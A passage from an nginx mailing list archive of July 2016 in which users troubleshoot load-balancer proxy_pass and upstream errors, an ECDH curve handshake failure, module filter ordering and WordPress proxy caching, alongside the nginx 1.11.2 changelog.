The version is : nginx-1.10.1-1.el6.ngx.x86_64 When using nginx as a load balancer I would like to know if nginx forwards requests to backend servers using http or https?? _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From drew at drewnturner.com Tue Jul 5 14:47:28 2016 From: drew at drewnturner.com (Drew Turner) Date: Tue, 5 Jul 2016 09:47:28 -0500 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: <1467729702919.45075@cscontract.com> References: <1467728782092.71066@cscontract.com> <1467729702919.45075@cscontract.com> Message-ID: Yes that is in proxy_pass. Are you sure proxy_pass is defined in the server stanza and that it's inside an include stanza? Posting the code would be helpful if you can redact the sensitive information. On Tue, Jul 5, 2016 at 9:41 AM, Brian Pugh wrote: > Are you referring to the proxy pass declaration? If so I get an error when > I uncomment that line out saying "nginx: [emerg] "proxy_pass" directive is > not allowed here in /etc/nginx/conf.d/default.conf:40?" > > > > > ------------------------------ > *From:* nginx on behalf of Drew Turner < > drew at drewnturner.com> > *Sent:* Tuesday, July 5, 2016 9:33 AM > *To:* nginx at nginx.org > *Subject:* Re: does nginx forward requests to backend servers using http > or https? > > You define what you want it sent to the backend as. So if you use > http://backendserver it's http, if https://backendserver:443 - https. > > On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh wrote: > >> I am using the free version of nginx on RHEL 6.7. The version is : >> >> >> nginx-1.10.1-1.el6.ngx.x86_64 >> >> >> When using nginx as a load balancer I would like to know if nginx >> forwards requests to backend servers using http or https?? 
>> >> >> >> >> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From florian at bottledsoftware.de Tue Jul 5 15:02:07 2016 From: florian at bottledsoftware.de (Florian Reinhart) Date: Tue, 5 Jul 2016 17:02:07 +0200 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <20160705143948.GJ30781@mdounin.ru> References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> Message-ID: <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> Thanks a lot for your suggestions. It is the same certificate on both servers and it is indeed a secp256r1 aka prime256v1 certificate. So does this mean I have to use prime256v1 for ssl_ecdh_curve with this certificate? It's still strange that it used to work before... Here is what the error log says: 2016/07/05 16:57:09 [info] 2525#2525: *115 SSL_do_handshake() failed (SSL: error:1408A0C1:SSL routines:ssl3_get_client_hello:no shared cipher) while SSL handshaking, client: 192.168.241.1, server: 0.0.0.0:443 Thanks again! > On 05 Jul 2016, at 16:39, Maxim Dounin wrote: > > Hello! > > On Tue, Jul 05, 2016 at 04:02:21PM +0200, Florian Reinhart wrote: > >> Hi Maxim! >> >> That's what I thought. 
However, all clients can access the nginx server on the old Ubuntu 14.04 server, which uses the same config, >> >> I tested the following clients on OS X 10.11.5, all failed to connect: >> >> curl, installed from Homebrew: curl 7.49.1 (x86_64-apple-darwin15.5.0) libcurl/7.49.1 OpenSSL/1.0.2h zlib/1.2.5 nghttp2/1.12.0 >> Safari 9.1.1 (11601.6.17) >> Chrome 51.0.2704.106 >> Firefox 47.0.1 >> >> That?s why I don?t think it is a client issue. > > Yes, at least browsers are expected to support secp384r1, so it's > probably something different. > > Which certificate do you use? Is it the same as on the old > server? Such a situation can easily happen if the only > certificate available is ECDSA one and uses, e.g., prime256v1 (not > secp384r1), but only secp384r1 is enabled by the configuration. > > Looking into nginx error logs might also somewhat help to diagnose > what goes on here. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From project722 at gmail.com Tue Jul 5 15:05:14 2016 From: project722 at gmail.com (NdridCold .) Date: Tue, 5 Jul 2016 10:05:14 -0500 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: References: <1467728782092.71066@cscontract.com> <1467729702919.45075@cscontract.com> Message-ID: Yes, However I did not have the entire stanza un-commented out. I have done that, but now I am encountered with a different error message. 
Now I get: nginx: [emerg] host not found in upstream "resolveservergroup.com" in /etc/nginx/conf.d/default.conf:40 Here is my default.conf file: upstream backendservergroup.com { # Use ip hash for session persistance ip_hash; # backend server 1 server 192.168.155.120; # backend server 2 server 192.168.155.126; # backend server 3 server 192.168.155.127; # The below only works on nginx plus #sticky route $route_cookie $route_uri; } server { listen 80; server_name nginxserver.com; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass http://backendservergroup.com; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } server { listen 443 ssl; server_name nginxserver.com; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass https://backendservergroup.com:443; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to 
FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} On Tue, Jul 5, 2016 at 9:47 AM, Drew Turner wrote: > Yes that is in proxy_pass. Are you sure proxy_pass is defined in the > server stanza and that it's inside an include stanza? > > Posting the code would be helpful if you can redact the sensitive > information. > > On Tue, Jul 5, 2016 at 9:41 AM, Brian Pugh wrote: > >> Are you referring to the proxy pass declaration? If so I get an error >> when I uncomment that line out saying "nginx: [emerg] "proxy_pass" >> directive is not allowed here in /etc/nginx/conf.d/default.conf:40?" >> >> >> >> >> ------------------------------ >> *From:* nginx on behalf of Drew Turner < >> drew at drewnturner.com> >> *Sent:* Tuesday, July 5, 2016 9:33 AM >> *To:* nginx at nginx.org >> *Subject:* Re: does nginx forward requests to backend servers using http >> or https? >> >> You define what you want it sent to the backend as. So if you use >> http://backendserver it's http, if https://backendserver:443 - https. >> >> On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh wrote: >> >>> I am using the free version of nginx on RHEL 6.7. The version is : >>> >>> >>> nginx-1.10.1-1.el6.ngx.x86_64 >>> >>> >>> When using nginx as a load balancer I would like to know if nginx >>> forwards requests to backend servers using http or https?? 
>>> >>> >>> >>> >>> >>> >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From reallfqq-nginx at yahoo.fr Tue Jul 5 16:06:32 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Tue, 5 Jul 2016 18:06:32 +0200 Subject: Order of execution of nginx filters In-Reply-To: <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> Message-ID: AFAIK you do not control the order of filters, and when you are building a filter, you deal with data on-the-fly, which means your filter might be invoked with a partial response coming from other filters. Moreover, the module needs to 'win' its selection on a specific event. I suggest you read some available literature (ex: http://www.evanmiller.org/nginx-modules-guide.html, specifically http://www.evanmiller.org/nginx-modules-guide.html#filters-body which seems to implement something close to what you wish). ?There is most probably more competent people to that matter who would give you better docs, but this is a head start I guess.? --- *B. R.* On Tue, Jul 5, 2016 at 6:06 AM, Raghavan, Gopal wrote: > Hi, > > > > I have the following three directives: > > > > location = /hello { > > hello_world; > > hola_mundo on; > > bonjour_monde on; > > } > > > > hello_world is an nginx handler module that provides content ?hello world? > > hola_mundo and bonjour_monde are filters that add to the chain strings > ?hola mundo? and ?bonjour monde? respectively. 
> > > > > > Here is the output: > > curl "http://localhost:8090/hello" > > hello worldhola mundobonjour monde > > > > > > Switching the filter directives in location block has no impact on output > string. > > > > For eg: > > > > location = /hello { > > hello_world; > > bonjour_monde on; > > hola_mundo on; > > } > > > > Here is the output: > > curl "http://localhost:8090/hello" > > hello worldhola mundobonjour monde > > > > > > How do I control the order of execution of filters? > > I already looked at objs/ngx_modules.c and auto/modules. My custom > handlers and filters are not listed there. > > > > One thing that I observed is that the order of listing the load_module > modules/*.so in conf/nginx.conf does impact the order of execution of the > filters. > > > > Is there any other trick to adjust the execution order within the location > block? > > > > Thanks, > > -- > > Gopal > > > > > > > > > > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From project722 at gmail.com Tue Jul 5 16:11:48 2016 From: project722 at gmail.com (NdridCold .) Date: Tue, 5 Jul 2016 11:11:48 -0500 Subject: basic nginx setup help as load balancer Message-ID: I was getting a host not found problem while trying to start nginx. nginx: [emerg] host not found in upstream "backendservers.com" in /etc/nginx/conf.d/default.conf:37 I am fairly certain that this is because there is no name resolution for " backendservers.com" in our DNS. So I changed up a few things to make it work. But I am confused on a few concepts here. First of all, should my server name in the "upstream" directive be the same name in the "server_name" directive in the "server" stanza? 
Here is what I have so far: upstream myapplication.net { # Use ip hash for session persistance ip_hash; server 1.net; server 2.net; server 3..net; # The below only works on nginx plus #sticky route $route_cookie $route_uri; } server { listen 80; server_name myapplication.net; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass http://myapplication.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } server { listen 443 ssl; server_name myapplication.net; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass https://myapplication.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php;# fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include 
fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} So here is what I need to happen. I need nginx to asnwer requests for myapplication.net and send them to the servers "server1,net, server2.net, and server3.net". Am I accomplishing this with this config? And to recap, should my server name in the "upstream" directive be the same name in the "server_name" directive in the "server" stanza? -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Jul 5 16:22:32 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 5 Jul 2016 19:22:32 +0300 Subject: nginx-1.11.2 Message-ID: <20160705162232.GO30781@mdounin.ru> Changes with nginx 1.11.2 05 Jul 2016 *) Change: now nginx always uses internal MD5 and SHA1 implementations; the --with-md5 and --with-sha1 configure options were canceled. *) Feature: variables support in the stream module. *) Feature: the ngx_stream_map_module. *) Feature: the ngx_stream_return_module. *) Feature: a port can be specified in the "proxy_bind", "fastcgi_bind", "memcached_bind", "scgi_bind", and "uwsgi_bind" directives. *) Feature: now nginx uses the IP_BIND_ADDRESS_NO_PORT socket option when available. *) Bugfix: a segmentation fault might occur in a worker process when using HTTP/2 and the "proxy_request_buffering" directive. *) Bugfix: the "Content-Length" request header line was always added to requests passed to backends, including requests without body, when using HTTP/2. *) Bugfix: "http request count is zero" alerts might appear in logs when using HTTP/2. *) Bugfix: unnecessary buffering might occur when using the "sub_filter" directive; the issue had appeared in 1.9.4. 
-- Maxim Dounin http://nginx.org/ From absolutely_free at libero.it Tue Jul 5 16:25:09 2016 From: absolutely_free at libero.it (absolutely_free at libero.it) Date: Tue, 5 Jul 2016 18:25:09 +0200 (CEST) Subject: cache issue with cms Message-ID: <2131669275.4018781467735909902.JavaMail.httpd@webmail-24.iol.local> Hi, I am using nginx version 1.10.1 as a reverse proxy in front of Apache 2.2.15. I noticed that if I change something in the backend (e.g. modify some text in an article), the changes appear on the frontend, but I still see the old post's content in the backend. I tried to disable any caching mechanism for /wp-admin and /wp-login. I hope I did this properly; can you help me figure out any errors in this configuration? This is my nginx global config: #################################################### user nginx nginx; worker_processes 4; error_log /var/log/nginx/error.log; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; # Defines the cache log format, cache log location # and the main access log location. log_format cache '***$time_local ' '$upstream_cache_status ' 'Cache-Control: $upstream_http_cache_control ' 'Expires: $upstream_http_expires ' '$host ' '"$request" ($status) ' '"$http_user_agent" ' 'Args: $args ' 'Wordpress Auth Cookie: $wordpress_auth '; access_log /var/log/nginx/cache.log cache; access_log /var/log/nginx/access.log; # Proxy cache and temp configuration. proxy_cache_path /mnt/ramdisk/nginx_cache levels=1:2 keys_zone=main:10m max_size=1g inactive=30m; proxy_temp_path /mnt/ramdisk/nginx_temp; proxy_ignore_headers X-Accel-Expires Expires Cache-Control Set-Cookie; proxy_hide_header Pragma; proxy_hide_header Expires; proxy_hide_header Cache-Control; expires 1d; # Gzip Configuration. 
gzip_vary off; gzip on; gzip_disable msie6; gzip_static on; gzip_comp_level 4; gzip_proxied any; gzip_types text/plain text/css application/x-javascript text/xml application/xml application/xml+rss text/javascript; upstream backend { ip_hash; server 127.0.0.1:8080; # IP goes here. } This is my nginx's virtual host config: server { listen xxxx.xxxx.xxx.xx:80; # IP goes here. server_name www.domain.com; # IP could go here. # Set proxy headers for the passthrough proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; # Let the Set-Cookie header through. proxy_pass_header Set-Cookie; # Max upload size: make sure this matches the php.ini in .htaccess client_max_body_size 8m; # Catch the wordpress cookies. # Must be set to blank first for when they don't exist. set $wordpress_auth ""; if ($http_cookie ~* "wordpress_logged_in_[^=]*=([^%]+)%7C") { set $wordpress_auth wordpress_logged_in_$1; } # Set the proxy cache key set $cache_key $scheme$host$uri$is_args$args; # All media (including uploaded) is under wp-content/ so# instead of caching the response from apache, we're just# going to use nginx to serve directly from there. location ~* ^/(wp-content|wp-includes)/(.*)\.(gif|jpg|jpeg|png|ico|bmp|js|css|pdf|doc)$ { root /home/domain.com; } # Don't cache these pages. location ~* ^/(wp-admin|wp-login.php){ proxy_pass http://backend; } location / { proxy_pass http://backend; proxy_cache main; proxy_cache_key $cache_key; proxy_cache_valid 30m; # 200, 301 and 302 will be cached. proxy_cache_use_stale error timeout invalid_header http_500 http_502 http_504 http_404; # 2 rules to dedicate the no caching rule for logged in users. proxy_cache_bypass $wordpress_auth; # Do not cache the response. proxy_no_cache $wordpress_auth; # Do not serve response from cache. 
proxy_buffers 8 2m; proxy_buffer_size 10m; proxy_busy_buffers_size 10m; } }} Thank you very much -------------- next part -------------- An HTML attachment was scrubbed... URL: From kworthington at gmail.com Tue Jul 5 18:01:44 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 5 Jul 2016 14:01:44 -0400 Subject: [nginx-announce] nginx-1.11.2 In-Reply-To: <20160705162237.GP30781@mdounin.ru> References: <20160705162237.GP30781@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.11.2 for Windows https://kevinworthington.com/nginxwin1112 (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Jul 5, 2016 at 12:22 PM, Maxim Dounin wrote: > Changes with nginx 1.11.2 05 Jul > 2016 > > *) Change: now nginx always uses internal MD5 and SHA1 implementations; > the --with-md5 and --with-sha1 configure options were canceled. > > *) Feature: variables support in the stream module. > > *) Feature: the ngx_stream_map_module. > > *) Feature: the ngx_stream_return_module. > > *) Feature: a port can be specified in the "proxy_bind", > "fastcgi_bind", > "memcached_bind", "scgi_bind", and "uwsgi_bind" directives. > > *) Feature: now nginx uses the IP_BIND_ADDRESS_NO_PORT socket option > when available. > > *) Bugfix: a segmentation fault might occur in a worker process when > using HTTP/2 and the "proxy_request_buffering" directive. > > *) Bugfix: the "Content-Length" request header line was always added to > requests passed to backends, including requests without body, when > using HTTP/2. 
> > *) Bugfix: "http request count is zero" alerts might appear in logs > when > using HTTP/2. > > *) Bugfix: unnecessary buffering might occur when using the > "sub_filter" > directive; the issue had appeared in 1.9.4. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Jul 5 18:16:14 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 5 Jul 2016 21:16:14 +0300 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> Message-ID: <20160705181614.GT30781@mdounin.ru> Hello! On Tue, Jul 05, 2016 at 05:02:07PM +0200, Florian Reinhart wrote: > It is the same certificate on both servers and it is indeed a > secp256r1 aka prime256v1 certificate. So does this mean, I have > to use prime256v1 for ssl_ecdh_curve with this certificate? It?s > still strange that it used to work before... Since version 1.11.0 nginx uses the new SSL_CTX_set1_curves_list() interface if available to configure supported curves, instead of previously used EC_KEY_new_by_curve_name()/SSL_CTX_set_tmp_ecdh(). This new interface is generally better as it allows configuring multiple curves. I've just tested, and it looks like this new interface is also more strict. With previous interface it was possible to use any certificate regardless of the ssl_ecdh_curve setting, and that's why it worked for you in older versions. The new interface does not allow to use curves which are not listed at all, including certificates using these curves. 
Solution would be to list all curves you want to use, including curves used by certificates, e.g.: ssl_ecdh_curve secp384r1:prime256v1; Or, better yet, just leave the default ("auto"), it will allow most common curves as supported by OpenSSL. -- Maxim Dounin http://nginx.org/ From r at roze.lv Tue Jul 5 18:42:18 2016 From: r at roze.lv (Reinis Rozitis) Date: Tue, 5 Jul 2016 21:42:18 +0300 Subject: basic nginx setup help as load balancer In-Reply-To: References: Message-ID: <4C79A6BD1B674FCB933A438067B984E0@NeiRoze> > But I am confused on a few concepts here. First of all, should my server > name in the "upstream" directive be the same name in the "server_name" > directive in the "server" stanza? Here is what I have so far: > And to recap, should my server name in the "upstream" directive be the > same name in the "server_name" directive in the "server" stanza? It is not a requirement, but depending on how your backend servers are configured (if they are name-based virtualhosts) you may need to specify the correct Host header. By default nginx sends whatever it is given in the proxy_pass directive. Taking your configuration for example: upstream myapplication.net { server 1.net; server 2.net; server 3..net; } location { proxy_pass http://myapplication.net; } 1. On startup Nginx will resolve the 1.net .. 3.net hostnames 2. It will send a request for 'myapplication.net' (Host) to whichever upstream server IP it has chosen (not using the upstream hostnames). It also doesn't use server_name. If the backend has a name-based configuration and there is no 'myapplication.net' virtualhost (or it isn't the default one) the whole request will generally fail (not return what was expected). 
If that is the case you either need to configure the upstream block (which for nginx is just a virtual name) and the proxy_pass to match your backend configuration, or, as people usually do, just add an additional header: location { proxy_pass http://myapplication.net; proxy_set_header Host $host; } This way nginx sends the actual hostname from the request to the backend. Of course you can also use $server_name (or any other variable http://nginx.org/en/docs/varindex.html or even a static value) but usually server_name is something like .domain.com (for wildcard matching) so it may confuse the backend. rr From absolutely_free at libero.it Tue Jul 5 19:22:55 2016 From: absolutely_free at libero.it (absolutely_free at libero.it) Date: Tue, 5 Jul 2016 21:22:55 +0200 (CEST) Subject: very simple question about cache Message-ID: <544265138.4070811467746575919.JavaMail.httpd@webmail-24.iol.local> Hi, I set up a simple reverse proxy (backend is an Apache web server): upstream backend { ip_hash; server 127.0.0.1:8080; } server { listen x.y.w.z:80; # IP goes here. server_name somedomain.com; expires off; location / { proxy_pass http://backend; } real_ip_header X-Forwarded-For; # Set proxy headers for the passthrough proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; access_log /var/log/nginx/domain.cache.log cache; access_log /var/log/nginx/domain.access.log; } While browsing the website, I see lots of entries in the /var/log/nginx/domain.cache.log file (and of course in /var/log/nginx/domain.access.log too). My question is: with this configuration, is there any caching active? 
Example of cache log: ***05/Jul/2016:21:15:59 +0200 - Cache-Control: - Expires: - some.domain.net "GET /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore,customize-base,customize-loader,thickbox,plugin-instal&load%5B%5D=l,shortcode,media-upload,svg-painter,heartbeat,wp-auth-check,wp-a11y,wplink,jquery-ui-position,jquery-ui-menu,jquery-ui-autocomp&load%5B%5D=lete&ver=4.5.3 HTTP/1.1" (304) "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" Args: c=0&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore,customize-base,customize-loader,thickbox,plugin-instal&load%5B%5D=l,shortcode,media-upload,svg-painter,heartbeat,wp-auth-check,wp-a11y,wplink,jquery-ui-position,jquery-ui-menu,jquery-ui-autocomp&load%5B%5D=lete&ver=4.5.3 Wordpress Auth Cookie: ***05/Jul/2016:21:16:59 +0200 - Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT some.domain.net "POST /wp-admin/admin-ajax.php HTTP/1.1" (200) "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" Args: - Wordpress Auth Cookie: ***05/Jul/2016:21:18:59 +0200 - Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT some.domain.net "POST /wp-admin/admin-ajax.php HTTP/1.1" (200) "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" Args: - Wordpress Auth Cookie: -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From giovani.rinaldi at azion.com Tue Jul 5 19:44:07 2016 From: giovani.rinaldi at azion.com (Giovani Rinaldi) Date: Tue, 5 Jul 2016 16:44:07 -0300 Subject: Cache calculating erroneous size Message-ID: Hello, I've been experiencing a rather strange situation regarding the cache size occupation (calculated by nginx's cache manager and reported in debug logs) versus the real occupied size as reported by `df`. For example: - reported by cache manager: 76009.340M disk space used, 19458391 disk blocks (4K) used, 2583292 unique files in cache. - reported by df: 64203.512M of disk space used, 16436099 disk blocks (4K) used, 2583861 unique files in cache (this number is an approximation, due to the find command taking more time to return). So, in summary, Nginx is counting files correctly, but not their sizes/blocks used (it is my understanding that it counts blocks, not bytes). As a consequence, when the calculated cache size reaches the max_size defined in proxy_cache_path, forced evictions start occurring. I must point out that these evictions are due to max_size being reached and not inactive time (I differentiate both of these cases in debug log messages) or the file count watermark (related to keyzone capacity) being reached. Here's the configuration of my proxy cache: proxy_cache_path /xfs/http levels=1:2 keys_zone=smallfiles:800m > max_size=100g inactive=90d; > proxy_temp_path /tmp; > First I thought this could be related to allocsize in XFS (https://trac.nginx.org/nginx/ticket/157), but the problem persists even when utilizing 4K instead of the default (64K). Also I must point out that there's another cache zone being utilized (also with XFS but on another disk) by the same nginx servers, though it is utilized for caching larger files (more than 1 MB in size on average), and it does not suffer from this cache size discrepancy. Restarting Nginx (or upgrading it) temporarily solves the problem, as the cache loader correctly calculates the total cache size. 
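[Editor's note: the blocks-versus-bytes distinction raised above can be demonstrated outside nginx. This small Python sketch, an illustration rather than nginx code, compares a file's logical byte size with its allocated size derived from st_blocks, which is what block-based disk accounting sees:]

```python
import os
import tempfile

def sizes(path):
    """Return (allocated_bytes, logical_bytes) for a file.
    st_blocks is counted in 512-byte units per POSIX."""
    st = os.stat(path)
    return st.st_blocks * 512, st.st_size

# A 1-byte file still occupies at least one filesystem block once it
# has been flushed to disk, so block-based accounting can exceed the
# byte count considerably on caches full of small files.
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"x")
    f.flush()
    os.fsync(f.fileno())
    name = f.name

allocated, logical = sizes(name)
print(allocated, logical)  # e.g. "4096 1" on a filesystem with 4K blocks
os.remove(name)
```

[On XFS with a large allocsize, speculative preallocation inflates the allocated figure further, which fits the discrepancy described in the message.]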
Thanks, -- Giovani Rinaldi -------------- next part -------------- An HTML attachment was scrubbed... URL: From drew at drewnturner.com Tue Jul 5 19:54:23 2016 From: drew at drewnturner.com (Drew Turner) Date: Tue, 5 Jul 2016 14:54:23 -0500 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: References: <1467728782092.71066@cscontract.com> <1467729702919.45075@cscontract.com> Message-ID: can you move the backend server declaration from your .conf file to the nginx.conf file inside the http stanza? On Tue, Jul 5, 2016 at 10:05 AM, NdridCold . wrote: > Yes, However I did not have the entire stanza un-commented out. I have > done that, but now I am encountered with a different error message. Now I > get: > > nginx: [emerg] host not found in upstream "resolveservergroup.com" in > /etc/nginx/conf.d/default.conf:40 > > Here is my default.conf file: > > upstream backendservergroup.com { > # Use ip hash for session persistance > ip_hash; > # backend server 1 > server 192.168.155.120; > # backend server 2 > server 192.168.155.126; > # backend server 3 > server 192.168.155.127; > > # The below only works on nginx plus > #sticky route $route_cookie $route_uri; > } > server { > > listen 80; > server_name nginxserver.com; > keepalive_timeout 70; > > #charset koi8-r; > #access_log /var/log/nginx/log/host.access.log main; > > location / { > root /usr/share/nginx/html; > index index.html index.htm; > } > > #error_page 404 /404.html; > > # redirect server error pages to the static page /50x.html > # > error_page 500 502 503 504 /50x.html; > location = /50x.html { > root /usr/share/nginx/html; > } > > # proxy the PHP scripts to Apache listening on 127.0.0.1:80 > # > location ~ \.php$ { > proxy_pass http://backendservergroup.com; > proxy_http_version 1.1; > proxy_set_header Connection ""; > } > > # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 > # > #location ~ \.php$ { > # root html; > # fastcgi_pass 127.0.0.1:9000; > # 
fastcgi_index index.php; > # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; > # include fastcgi_params; > #} > > # deny access to .htaccess files, if Apache's document root > # concurs with nginx's one > # > #location ~ /\.ht { > # deny all; > #} > } > > server { > > listen 443 ssl; > server_name nginxserver.com; > keepalive_timeout 70; > > #charset koi8-r; > #access_log /var/log/nginx/log/host.access.log main; > > location / { > root /usr/share/nginx/html; > index index.html index.htm; > } > > #error_page 404 /404.html; > > # redirect server error pages to the static page /50x.html > # > error_page 500 502 503 504 /50x.html; > location = /50x.html { > root /usr/share/nginx/html; > } > > # proxy the PHP scripts to Apache listening on 127.0.0.1:80 > # > location ~ \.php$ { > proxy_pass https://backendservergroup.com:443; > proxy_http_version 1.1; > proxy_set_header Connection ""; > } > > # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 > # > #location ~ \.php$ { > # root html; > # fastcgi_pass 127.0.0.1:9000; > # fastcgi_index index.php; > # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; > # include fastcgi_params; > #} > > # deny access to .htaccess files, if Apache's document root > # concurs with nginx's one > # > #location ~ /\.ht { > # deny all; > #} > > > > > On Tue, Jul 5, 2016 at 9:47 AM, Drew Turner wrote: > >> Yes that is in 